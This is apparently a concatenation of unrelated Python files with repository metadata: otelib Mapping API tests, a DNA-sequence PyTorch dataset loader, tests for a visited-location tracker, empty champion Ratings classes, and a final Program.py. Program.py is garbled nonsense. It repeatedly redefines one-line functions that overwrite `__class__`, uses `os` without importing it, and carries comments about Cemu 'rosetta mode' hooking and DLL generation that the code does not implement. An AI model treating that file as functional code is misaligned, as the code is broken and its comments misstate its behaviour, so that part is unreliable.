**testdata("mapping"),
)
assert mapping.id
def test_create_fails(
mock_ote_response: "OTEResponse",
server_url: str,
testdata: "Callable[[Union[ResourceType, str]], dict]",
) -> None:
"""Check `Mapping.create()` raises `ApiError` upon request failure."""
from otelib.exceptions import ApiError
from otelib.strategies.mapping import Mapping
mock_ote_response(
method="post",
endpoint="/mapping",
status_code=500,
return_content=b"Internal Server Error",
)
mapping = Mapping(server_url)
assert mapping.id is None
with pytest.raises(ApiError, match="APIError"):
# `session_id` has a wrong type, the request should fail.
mapping.create(
mappingType="triples",
**testdata("mapping"),
session_id=123,
)
assert mapping.id is None
def test_fetch(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
testdata: "Callable[[Union[ResourceType, str]], dict]",
) -> None:
"""Test `Mapping.fetch()`."""
import json
from otelib.strategies.mapping import Mapping
mock_ote_response(
method="post",
endpoint="/mapping",
return_json={"mapping_id": ids("mapping")},
)
mock_ote_response(
method="get",
endpoint=f"/mapping/{ids('mapping')}",
return_json={},
)
mapping = Mapping(server_url)
# We must first create the resource - getting a resource ID
mapping.create(
mappingType="triples",
**testdata("mapping"),
)
content = mapping.fetch(session_id=None)
assert json.loads(content) == {}
def test_fetch_fails(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
testdata: "Callable[[Union[ResourceType, str]], dict]",
) -> None:
"""Check `Mapping.fetch()` raises `ApiError` upon request failure."""
from otelib.exceptions import ApiError
from otelib.strategies.mapping import Mapping
mock_ote_response(
method="post",
endpoint="/mapping",
return_json={"mapping_id": ids("mapping")},
)
mock_ote_response(
method="get",
endpoint=f"/mapping/{ids('mapping')}",
status_code=500,
return_content=b"Internal Server Error",
)
mapping = Mapping(server_url)
# We must first create the resource - getting a resource ID
mapping.create(
mappingType="triples",
**testdata("mapping"),
)
with pytest.raises(ApiError, match="APIError"):
# `session_id` has a wrong type, the request should fail.
mapping.fetch(session_id=123)
def test_initialize(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
testdata: "Callable[[Union[ResourceType, str]], dict]",
) -> None:
"""Test `Mapping.fetch()`."""
import json
from otelib.strategies.mapping import Mapping
mock_ote_response(
method="post",
endpoint="/mapping",
return_json={"mapping_id": ids("mapping")},
)
mock_ote_response(
method="post",
endpoint=f"/mapping/{ids('mapping')}/initialize",
return_json=testdata("mapping"),
)
mapping = Mapping(server_url)
# We must first create the resource - getting a resource ID
mapping.create(
mappingType="triples",
**testdata("mapping"),
)
content = mapping.initialize(session_id=None)
assert json.loads(content) == testdata("mapping")
def test_initialize_fails(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
testdata: "Callable[[Union[ResourceType, str]], dict]",
) -> None:
"""Check `Mapping.fetch()` raises `ApiError` upon request failure."""
from otelib.exceptions import ApiError
from otelib.strategies.mapping import Mapping
mock_ote_response(
method="post",
endpoint="/mapping",
return_json={"mapping_id": ids("mapping")},
)
mock_ote_response(
method="post",
endpoint=f"/mapping/{ids('mapping')}/initialize",
status_code=500,
return_content=b"Internal Server Error",
)
mapping = Mapping(server_url)
# We must first create the resource - getting a resource ID
mapping.create(
mappingType="triples",
**testdata("mapping"),
)
with pytest.raises(ApiError, match="APIError"):
# `session_id` has a wrong type, the request should fail.
mapping.initialize(session_id=123)
| 25.622642 | 74 | 0.634573 | 597 | 5,432 | 5.638191 | 0.125628 | 0.033274 | 0.071301 | 0.091503 | 0.887106 | 0.869578 | 0.844326 | 0.823529 | 0.823529 | 0.804219 | 0 | 0.004322 | 0.233247 | 5,432 | 211 | 75 | 25.744076 | 0.803842 | 0.129786 | 0 | 0.75 | 0 | 0 | 0.213661 | 0.09413 | 0 | 0 | 0 | 0 | 0.040541 | 1 | 0.040541 | false | 0 | 0.101351 | 0 | 0.141892 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
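Every test above pins down the same contract: creating or using a `Mapping` with no `session_id` succeeds, while a wrongly-typed `session_id` must surface as an `ApiError` matching "APIError". A dependency-free stub of that contract (the function and message here are hypothetical illustrations, not the real otelib implementation):

```python
class ApiError(Exception):
    """Stand-in for otelib.exceptions.ApiError."""

def create_mapping(session_id=None):
    # Mirrors what the tests assert: a non-string session_id fails the request.
    if session_id is not None and not isinstance(session_id, str):
        raise ApiError("APIError: session_id must be a string")
    return "mapping-id"

print(create_mapping())  # → mapping-id
```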
6bae49d7a47bab625f5efff882f8f846421bd2ef | 6,666 | py | Python | satori/datasets.py | jeffhsu3/satori | 4e43e57b7a3634ce257c55cd82082e6b531ca0bd | [
"MIT"
] | 5 | 2021-07-09T02:15:59.000Z | 2022-01-21T07:59:27.000Z | satori/datasets.py | jeffhsu3/satori | 4e43e57b7a3634ce257c55cd82082e6b531ca0bd | [
"MIT"
] | null | null | null | satori/datasets.py | jeffhsu3/satori | 4e43e57b7a3634ce257c55cd82082e6b531ca0bd | [
"MIT"
] | 1 | 2021-07-09T02:16:01.000Z | 2021-07-09T02:16:01.000Z | import numpy as np
import pandas as pd
import random
import torch
from fastprogress import progress_bar
from random import randint
from torch.utils.data import Dataset
class DatasetLoadAll(Dataset):
def __init__(self, df_path, num_labels=2, for_embeddings=False):
self.DNAalphabet = {'A':'0', 'C':'1', 'G':'2', 'T':'3'}
        df_path = df_path.split('.')[0]  # just in case the user provides an extension
self.df_all = pd.read_csv(df_path+'.txt',delimiter='\t',header=None)
self.df_seq = pd.read_csv(df_path+'.fa',header=None)
strand = self.df_seq[0][0][-3:] #can be (+) or (.)
self.df_all['header'] = self.df_all.apply(lambda x: '>'+x[0]+':'+str(x[1])+'-'+str(x[2])+strand, axis=1)
self.chroms = self.df_all[0].unique()
self.df_seq_all = pd.concat([self.df_seq[::2].reset_index(drop=True), self.df_seq[1::2].reset_index(drop=True)], axis=1, sort=False)
self.df_seq_all.columns = ["header","sequence"]
#self.df_seq_all['chrom'] = self.df_seq_all['header'].apply(lambda x: x.strip('>').split(':')[0])
self.df_seq_all['sequence'].apply(lambda x: x.upper())
self.num_labels = num_labels
self.df = self.df_all
self.df_seq_final = self.df_seq_all
self.df = self.df.reset_index()
self.df_seq_final = self.df_seq_final.reset_index()
#self.df['header'] = self.df.apply(lambda x: '>'+x[0]+':'+str(x[1])+'-'+str(x[2])+'('+x[5]+')', axis=1)
if for_embeddings == False:
self.One_hot_Encoded_Tensors = []
self.Label_Tensors = []
self.Seqs = []
self.Header = []
for i in progress_bar(range(0,self.df.shape[0])): #tqdm() before
if self.num_labels == 2:
y = self.df[self.df.columns[-2]][i]
else:
y = np.asarray(self.df[self.df.columns[-2]][i].split(',')).astype(int)
y = self.one_hot_encode_labels(y)
header = self.df['header'][i]
self.Header.append(header)
X = self.df_seq_final['sequence'][self.df_seq_final['header']==header].array[0].upper()
#X = X.replace('N',list(self.DNAalphabet.keys())[randint(0,3)])
X = X.replace('N',list(self.DNAalphabet.keys())[random.choice([0,1,2,3])])
X = X.replace('S',list(self.DNAalphabet.keys())[random.choice([1,2])])
X = X.replace('W',list(self.DNAalphabet.keys())[random.choice([0,3])])
X = X.replace('K',list(self.DNAalphabet.keys())[random.choice([2,3])])
X = X.replace('Y',list(self.DNAalphabet.keys())[random.choice([1,3])])
X = X.replace('R',list(self.DNAalphabet.keys())[random.choice([0,2])])
X = X.replace('M',list(self.DNAalphabet.keys())[random.choice([0,1])])
self.Seqs.append(X)
X = self.one_hot_encode(X)
self.One_hot_Encoded_Tensors.append(torch.tensor(X))
self.Label_Tensors.append(torch.tensor(y))
def __len__(self):
return self.df.shape[0]
def get_all_data(self):
return self.df, self.df_seq_final
def get_all_chroms(self):
return self.chroms
def one_hot_encode(self,seq):
mapping = dict(zip("ACGT", range(4)))
seq2 = [mapping[i] for i in seq]
        return np.eye(4)[seq2].T.astype(np.int64)
def one_hot_encode_labels(self,y):
lbArr = np.zeros(self.num_labels)
lbArr[y] = 1
        return lbArr.astype(np.int64)
def __getitem__(self, idx):
return self.Header[idx],self.Seqs[idx],self.One_hot_Encoded_Tensors[idx],self.Label_Tensors[idx]
class DatasetLazyLoad(Dataset):
def __init__(self, df_path, num_labels=2):
self.DNAalphabet = {'A':'0', 'C':'1', 'G':'2', 'T':'3'}
        df_path = df_path.split('.')[0]  # just in case the user provides an extension
self.df_all = pd.read_csv(df_path+'.txt',delimiter='\t',header=None)
self.df_seq = pd.read_csv(df_path+'.fa',header=None)
strand = self.df_seq[0][0][-3:] #can be (+) or (.)
self.df_all['header'] = self.df_all.apply(lambda x: '>'+x[0]+':'+str(x[1])+'-'+str(x[2])+strand, axis=1)
self.chroms = self.df_all[0].unique()
self.df_seq_all = pd.concat([self.df_seq[::2].reset_index(drop=True), self.df_seq[1::2].reset_index(drop=True)], axis=1, sort=False)
self.df_seq_all.columns = ["header","sequence"]
#self.df_seq_all['chrom'] = self.df_seq_all['header'].apply(lambda x: x.strip('>').split(':')[0])
self.df_seq_all['sequence'].apply(lambda x: x.upper())
self.num_labels = num_labels
self.df = self.df_all
self.df_seq_final = self.df_seq_all
self.df = self.df.reset_index()
self.df_seq_final = self.df_seq_final.reset_index()
#self.df['header'] = self.df.apply(lambda x: '>'+x[0]+':'+str(x[1])+'-'+str(x[2])+'('+x[5]+')', axis=1)
def __len__(self):
return self.df.shape[0]
def get_all_data(self):
return self.df, self.df_seq_final
def get_all_chroms(self):
return self.chroms
def one_hot_encode(self,seq):
mapping = dict(zip("ACGT", range(4)))
seq2 = [mapping[i] for i in seq]
        return np.eye(4)[seq2].T.astype(np.int64)
def one_hot_encode_labels(self,y):
lbArr = np.zeros(self.num_labels)
lbArr[y] = 1
        return lbArr.astype(np.int64)
def __getitem__(self, idx):
if self.num_labels == 2:
y = self.df[self.df.columns[-2]][idx]
else:
y = np.asarray(self.df[self.df.columns[-2]][idx].split(',')).astype(int)
y = self.one_hot_encode_labels(y)
header = self.df['header'][idx]
X = self.df_seq_final['sequence'][self.df_seq_final['header']==header].array[0].upper()
#X = X.replace('N',list(self.DNAalphabet.keys())[randint(0,3)])
X = X.replace('N',list(self.DNAalphabet.keys())[random.choice([0,1,2,3])])
X = X.replace('S',list(self.DNAalphabet.keys())[random.choice([1,2])])
X = X.replace('W',list(self.DNAalphabet.keys())[random.choice([0,3])])
X = X.replace('K',list(self.DNAalphabet.keys())[random.choice([2,3])])
X = X.replace('Y',list(self.DNAalphabet.keys())[random.choice([1,3])])
X = X.replace('R',list(self.DNAalphabet.keys())[random.choice([0,2])])
X = X.replace('M',list(self.DNAalphabet.keys())[random.choice([0,1])])
seq = X
X = self.one_hot_encode(X)
return header,seq,torch.tensor(X),torch.tensor(y) | 49.014706 | 140 | 0.581308 | 1,009 | 6,666 | 3.675917 | 0.123885 | 0.11162 | 0.077649 | 0.099218 | 0.869776 | 0.850364 | 0.850364 | 0.837962 | 0.837962 | 0.819628 | 0 | 0.020575 | 0.227123 | 6,666 | 136 | 141 | 49.014706 | 0.69934 | 0.09706 | 0 | 0.736842 | 0 | 0 | 0.02696 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.122807 | false | 0 | 0.061404 | 0.061404 | 0.307018 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
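`one_hot_encode` above maps each DNA base A/C/G/T to a row index and returns a 4×L matrix via `np.eye(4)[seq2].T`. A dependency-free sketch of the same transform, to make the shape explicit:

```python
def one_hot_encode(seq):
    """Return a 4 x len(seq) matrix: row k is 1 where seq has base k (A,C,G,T)."""
    mapping = {"A": 0, "C": 1, "G": 2, "T": 3}
    idx = [mapping[base] for base in seq]
    return [[1 if i == row else 0 for i in idx] for row in range(4)]

encoded = one_hot_encode("ACGT")
print(encoded[0])  # → [1, 0, 0, 0]  (the 'A' row)
```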
6bb1ab54f629179fff806e2aea1ae7f1d77e91b2 | 4,000 | py | Python | visited_test.py | factabulous/matgrindr | 6f5d6d20e34f9b13950d654cf70afdb2e46f5d1e | [
"Apache-2.0"
] | 1 | 2018-03-31T12:15:07.000Z | 2018-03-31T12:15:07.000Z | visited_test.py | factabulous/matgrindr | 6f5d6d20e34f9b13950d654cf70afdb2e46f5d1e | [
"Apache-2.0"
] | null | null | null | visited_test.py | factabulous/matgrindr | 6f5d6d20e34f9b13950d654cf70afdb2e46f5d1e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
import unittest
import visited
class VisitedTest(unittest.TestCase):
def test_visited_recently(self):
"""
Checks that the visited state is remembered and expires after time
"""
v = visited.Visited()
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 },
when = 1000 )
self.assertTrue(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000))
self.assertFalse(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000 + 7 * 24 * 3600))
def test_visited_recently_with_respawn(self):
"""
Checks that the visited state is remembered and expires after time
"""
v = visited.Visited()
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0, 'respawn_days': 5 },
when = 1000 )
self.assertTrue(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000))
self.assertFalse(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000 + 5 * 24 * 3600))
def test_visited_recently_with_no_respawn(self):
"""
Checks that the visited state is remembered and we understand zero
periods
"""
v = visited.Visited()
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0, 'respawn_days': 0 },
when = 1000 )
self.assertFalse(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000))
def test_visited_case_sensitivity(self):
"""
        Checks that the store is not case-sensitive
"""
v = visited.Visited()
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 },
when = 1000 )
self.assertTrue(v.is_visited({ 'system': 'SOL', 'body': 'EARTH', 'lat': 0, 'lon': 0 }, when=1000))
self.assertFalse(v.is_visited({ 'system': 'SOL', 'body': 'EARTH', 'lat': 0, 'lon': 0 }, when=1000 + 7 * 24 * 3600))
def test_visited_multiple_times(self):
v = visited.Visited()
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 },
when = 1000 )
self.assertTrue(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000))
self.assertFalse(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000 + 7 * 24 * 3600))
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 },
when = 3000 )
# Now should be using the new recorded visit at 3000 secs
self.assertTrue(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000 + 7 * 24 * 3600))
self.assertFalse(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=3000 + 7 * 24 * 3600))
def test_never_visited(self):
v = visited.Visited()
self.assertFalse(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000))
def test_save(self):
v = visited.Visited()
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 },
when = 1000 )
self.assertTrue(v.is_visited({ 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 }, when=1000))
self.assertNotEqual('[]', v.save(when=1000))
self.assertEqual('[]', v.save(when=1000 + 7 * 24 * 3600))
def test_is_dirty(self):
v = visited.Visited()
self.assertFalse(v.is_dirty())
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 },
when = 1000 )
self.assertTrue(v.is_dirty())
v.save()
self.assertFalse(v.is_dirty())
v.set_visited( { 'system': 'Sol', 'body': 'Earth', 'lat': 0, 'lon': 0 },
when = 1001 )
self.assertTrue(v.is_dirty())
if __name__ == '__main__':
unittest.main()
| 45.977011 | 123 | 0.53625 | 513 | 4,000 | 4.068226 | 0.146199 | 0.137039 | 0.168663 | 0.210829 | 0.83517 | 0.815525 | 0.815525 | 0.7839 | 0.765692 | 0.765692 | 0 | 0.066803 | 0.2665 | 4,000 | 86 | 124 | 46.511628 | 0.644513 | 0.08225 | 0 | 0.576271 | 0 | 0 | 0.158027 | 0 | 0 | 0 | 0 | 0 | 0.322034 | 1 | 0.135593 | false | 0 | 0.033898 | 0 | 0.186441 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
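The expiry rule these tests pin down can be stated in a few lines: a visit stays current while `now - visited_at` is under the respawn window (7 days by default), and a `respawn_days` of 0 means the location never counts as visited. A standalone sketch of that rule (the function name is hypothetical, not the `visited` module's API):

```python
DEFAULT_RESPAWN_DAYS = 7

def is_visit_current(visited_at, now, respawn_days=DEFAULT_RESPAWN_DAYS):
    """True while the visit is still inside the respawn window."""
    if respawn_days == 0:
        return False  # a zero period means the material respawns immediately
    return now - visited_at < respawn_days * 24 * 3600

print(is_visit_current(1000, 1000))                  # → True
print(is_visit_current(1000, 1000 + 7 * 24 * 3600))  # → False
```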
6bf46c76ac4f6596f0235f6ecc938051452c91c6 | 5,993 | py | Python | loldib/getratings/models/NA/na_vi/na_vi_jng.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_vi/na_vi_jng.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_vi/na_vi_jng.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from getratings.models.ratings import Ratings
class NA_Vi_Jng_Aatrox(Ratings):
pass
class NA_Vi_Jng_Ahri(Ratings):
pass
class NA_Vi_Jng_Akali(Ratings):
pass
class NA_Vi_Jng_Alistar(Ratings):
pass
class NA_Vi_Jng_Amumu(Ratings):
pass
class NA_Vi_Jng_Anivia(Ratings):
pass
class NA_Vi_Jng_Annie(Ratings):
pass
class NA_Vi_Jng_Ashe(Ratings):
pass
class NA_Vi_Jng_AurelionSol(Ratings):
pass
class NA_Vi_Jng_Azir(Ratings):
pass
class NA_Vi_Jng_Bard(Ratings):
pass
class NA_Vi_Jng_Blitzcrank(Ratings):
pass
class NA_Vi_Jng_Brand(Ratings):
pass
class NA_Vi_Jng_Braum(Ratings):
pass
class NA_Vi_Jng_Caitlyn(Ratings):
pass
class NA_Vi_Jng_Camille(Ratings):
pass
class NA_Vi_Jng_Cassiopeia(Ratings):
pass
class NA_Vi_Jng_Chogath(Ratings):
pass
class NA_Vi_Jng_Corki(Ratings):
pass
class NA_Vi_Jng_Darius(Ratings):
pass
class NA_Vi_Jng_Diana(Ratings):
pass
class NA_Vi_Jng_Draven(Ratings):
pass
class NA_Vi_Jng_DrMundo(Ratings):
pass
class NA_Vi_Jng_Ekko(Ratings):
pass
class NA_Vi_Jng_Elise(Ratings):
pass
class NA_Vi_Jng_Evelynn(Ratings):
pass
class NA_Vi_Jng_Ezreal(Ratings):
pass
class NA_Vi_Jng_Fiddlesticks(Ratings):
pass
class NA_Vi_Jng_Fiora(Ratings):
pass
class NA_Vi_Jng_Fizz(Ratings):
pass
class NA_Vi_Jng_Galio(Ratings):
pass
class NA_Vi_Jng_Gangplank(Ratings):
pass
class NA_Vi_Jng_Garen(Ratings):
pass
class NA_Vi_Jng_Gnar(Ratings):
pass
class NA_Vi_Jng_Gragas(Ratings):
pass
class NA_Vi_Jng_Graves(Ratings):
pass
class NA_Vi_Jng_Hecarim(Ratings):
pass
class NA_Vi_Jng_Heimerdinger(Ratings):
pass
class NA_Vi_Jng_Illaoi(Ratings):
pass
class NA_Vi_Jng_Irelia(Ratings):
pass
class NA_Vi_Jng_Ivern(Ratings):
pass
class NA_Vi_Jng_Janna(Ratings):
pass
class NA_Vi_Jng_JarvanIV(Ratings):
pass
class NA_Vi_Jng_Jax(Ratings):
pass
class NA_Vi_Jng_Jayce(Ratings):
pass
class NA_Vi_Jng_Jhin(Ratings):
pass
class NA_Vi_Jng_Jinx(Ratings):
pass
class NA_Vi_Jng_Kalista(Ratings):
pass
class NA_Vi_Jng_Karma(Ratings):
pass
class NA_Vi_Jng_Karthus(Ratings):
pass
class NA_Vi_Jng_Kassadin(Ratings):
pass
class NA_Vi_Jng_Katarina(Ratings):
pass
class NA_Vi_Jng_Kayle(Ratings):
pass
class NA_Vi_Jng_Kayn(Ratings):
pass
class NA_Vi_Jng_Kennen(Ratings):
pass
class NA_Vi_Jng_Khazix(Ratings):
pass
class NA_Vi_Jng_Kindred(Ratings):
pass
class NA_Vi_Jng_Kled(Ratings):
pass
class NA_Vi_Jng_KogMaw(Ratings):
pass
class NA_Vi_Jng_Leblanc(Ratings):
pass
class NA_Vi_Jng_LeeSin(Ratings):
pass
class NA_Vi_Jng_Leona(Ratings):
pass
class NA_Vi_Jng_Lissandra(Ratings):
pass
class NA_Vi_Jng_Lucian(Ratings):
pass
class NA_Vi_Jng_Lulu(Ratings):
pass
class NA_Vi_Jng_Lux(Ratings):
pass
class NA_Vi_Jng_Malphite(Ratings):
pass
class NA_Vi_Jng_Malzahar(Ratings):
pass
class NA_Vi_Jng_Maokai(Ratings):
pass
class NA_Vi_Jng_MasterYi(Ratings):
pass
class NA_Vi_Jng_MissFortune(Ratings):
pass
class NA_Vi_Jng_MonkeyKing(Ratings):
pass
class NA_Vi_Jng_Mordekaiser(Ratings):
pass
class NA_Vi_Jng_Morgana(Ratings):
pass
class NA_Vi_Jng_Nami(Ratings):
pass
class NA_Vi_Jng_Nasus(Ratings):
pass
class NA_Vi_Jng_Nautilus(Ratings):
pass
class NA_Vi_Jng_Nidalee(Ratings):
pass
class NA_Vi_Jng_Nocturne(Ratings):
pass
class NA_Vi_Jng_Nunu(Ratings):
pass
class NA_Vi_Jng_Olaf(Ratings):
pass
class NA_Vi_Jng_Orianna(Ratings):
pass
class NA_Vi_Jng_Ornn(Ratings):
pass
class NA_Vi_Jng_Pantheon(Ratings):
pass
class NA_Vi_Jng_Poppy(Ratings):
pass
class NA_Vi_Jng_Quinn(Ratings):
pass
class NA_Vi_Jng_Rakan(Ratings):
pass
class NA_Vi_Jng_Rammus(Ratings):
pass
class NA_Vi_Jng_RekSai(Ratings):
pass
class NA_Vi_Jng_Renekton(Ratings):
pass
class NA_Vi_Jng_Rengar(Ratings):
pass
class NA_Vi_Jng_Riven(Ratings):
pass
class NA_Vi_Jng_Rumble(Ratings):
pass
class NA_Vi_Jng_Ryze(Ratings):
pass
class NA_Vi_Jng_Sejuani(Ratings):
pass
class NA_Vi_Jng_Shaco(Ratings):
pass
class NA_Vi_Jng_Shen(Ratings):
pass
class NA_Vi_Jng_Shyvana(Ratings):
pass
class NA_Vi_Jng_Singed(Ratings):
pass
class NA_Vi_Jng_Sion(Ratings):
pass
class NA_Vi_Jng_Sivir(Ratings):
pass
class NA_Vi_Jng_Skarner(Ratings):
pass
class NA_Vi_Jng_Sona(Ratings):
pass
class NA_Vi_Jng_Soraka(Ratings):
pass
class NA_Vi_Jng_Swain(Ratings):
pass
class NA_Vi_Jng_Syndra(Ratings):
pass
class NA_Vi_Jng_TahmKench(Ratings):
pass
class NA_Vi_Jng_Taliyah(Ratings):
pass
class NA_Vi_Jng_Talon(Ratings):
pass
class NA_Vi_Jng_Taric(Ratings):
pass
class NA_Vi_Jng_Teemo(Ratings):
pass
class NA_Vi_Jng_Thresh(Ratings):
pass
class NA_Vi_Jng_Tristana(Ratings):
pass
class NA_Vi_Jng_Trundle(Ratings):
pass
class NA_Vi_Jng_Tryndamere(Ratings):
pass
class NA_Vi_Jng_TwistedFate(Ratings):
pass
class NA_Vi_Jng_Twitch(Ratings):
pass
class NA_Vi_Jng_Udyr(Ratings):
pass
class NA_Vi_Jng_Urgot(Ratings):
pass
class NA_Vi_Jng_Varus(Ratings):
pass
class NA_Vi_Jng_Vayne(Ratings):
pass
class NA_Vi_Jng_Veigar(Ratings):
pass
class NA_Vi_Jng_Velkoz(Ratings):
pass
class NA_Vi_Jng_Vi(Ratings):
pass
class NA_Vi_Jng_Viktor(Ratings):
pass
class NA_Vi_Jng_Vladimir(Ratings):
pass
class NA_Vi_Jng_Volibear(Ratings):
pass
class NA_Vi_Jng_Warwick(Ratings):
pass
class NA_Vi_Jng_Xayah(Ratings):
pass
class NA_Vi_Jng_Xerath(Ratings):
pass
class NA_Vi_Jng_XinZhao(Ratings):
pass
class NA_Vi_Jng_Yasuo(Ratings):
pass
class NA_Vi_Jng_Yorick(Ratings):
pass
class NA_Vi_Jng_Zac(Ratings):
pass
class NA_Vi_Jng_Zed(Ratings):
pass
class NA_Vi_Jng_Ziggs(Ratings):
pass
class NA_Vi_Jng_Zilean(Ratings):
pass
class NA_Vi_Jng_Zyra(Ratings):
pass
| 14.371703 | 46 | 0.745203 | 972 | 5,993 | 4.168724 | 0.151235 | 0.238401 | 0.306515 | 0.408687 | 0.777641 | 0.777641 | 0 | 0 | 0 | 0 | 0 | 0 | 0.185383 | 5,993 | 416 | 47 | 14.40625 | 0.829988 | 0 | 0 | 0.498195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.498195 | 0.00361 | 0 | 0.501805 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
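The file above is roughly 130 identical empty subclasses, one per champion; only the class name varies. When that is the case, the same classes can be produced dynamically with `type` — a sketch under that assumption (champion list truncated, `Ratings` stubbed in place of the real base class):

```python
class Ratings:
    """Stand-in for getratings.models.ratings.Ratings."""

CHAMPIONS = ["Aatrox", "Ahri", "Akali", "Zyra"]  # truncated illustration list

generated = {
    f"NA_Vi_Jng_{name}": type(f"NA_Vi_Jng_{name}", (Ratings,), {})
    for name in CHAMPIONS
}

print(issubclass(generated["NA_Vi_Jng_Ahri"], Ratings))  # → True
```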
d43124657c352249aac28a235159eb38450f5328 | 2,396 | py | Python | Program.py | FlamesLLC/CEMURosettav0 | 20a6c8ae80fb83fa21dbb57174321d861ac14039 | [
"MIT"
] | null | null | null | Program.py | FlamesLLC/CEMURosettav0 | 20a6c8ae80fb83fa21dbb57174321d861ac14039 | [
"MIT"
] | null | null | null | Program.py | FlamesLLC/CEMURosettav0 | 20a6c8ae80fb83fa21dbb57174321d861ac14039 | [
"MIT"
] | null | null | null | ## this uses cemu and cemuhook to run it in opengl mode
def __init__(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
## prompt the cemuhook and cemu engine to run in rosetta mode
def __init__(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def RosettaMode(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def RosettaMode(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
## locate the cemu directory
def __init__(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
vulcan_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "vulcan")
def __init__(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
## when running generate a dll version of this file that hooks to cemuhook
def __init__(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
## rename cemuhook version to "PIxel Co. Rosetta"
def __init__(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def CEMU(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def varFPS(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def EngineType(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def optimization(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def cemuhook(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
def cemuhook(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__))
## install this to cemu version
